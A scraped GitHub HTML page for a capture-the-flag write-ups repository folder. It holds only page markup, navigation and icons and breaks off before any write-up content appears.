content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" /> <meta name="hostname" content="github.com"> <meta name="user-login" content=""> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5"> <meta name="go-import" content="github.com/hugoreb/CTF-Writeups git https://github.com/hugoreb/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="56917045" /><meta name="octolytics-dimension-user_login" content="hugoreb" /><meta name="octolytics-dimension-repository_id" content="347718098" /><meta name="octolytics-dimension-repository_nwo" content="hugoreb/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="347718098" /><meta name="octolytics-dimension-repository_network_root_nwo" content="hugoreb/CTF-Writeups" /> <link rel="canonical" href="https://github.com/hugoreb/CTF-Writeups/tree/main/DVC%20CTF" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex flex-items-center"> Sign up <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg> </button> </div> </div> <div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg> </button> </div> <nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span> Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span> GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span> <h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span> <h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details> Marketplace <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span> Compare plans <span>→</span> Contact Sales <span>→</span> Education <span>→</span> </div> </details> </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="347718098" data-scoped-search-url="/hugoreb/CTF-Writeups/search" data-owner-scoped-search-url="/users/hugoreb/search" data-unscoped-search-url="/search" action="/hugoreb/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="F1O+55zYvmcekzAZg9fH5DcBiftE32aAQfVG3u9fMu4H4KEM5F/fMgky8HonBZ8TfFefLFzc05/JlYyVFU0sPg==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div> Sign up </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> hugoreb </span> <span>/</span> CTF-Writeups <span></span><span>Public</span></h1> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications <div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span> 0 </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork 0 </div> <div id="responsive-meta-container" data-pjax-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 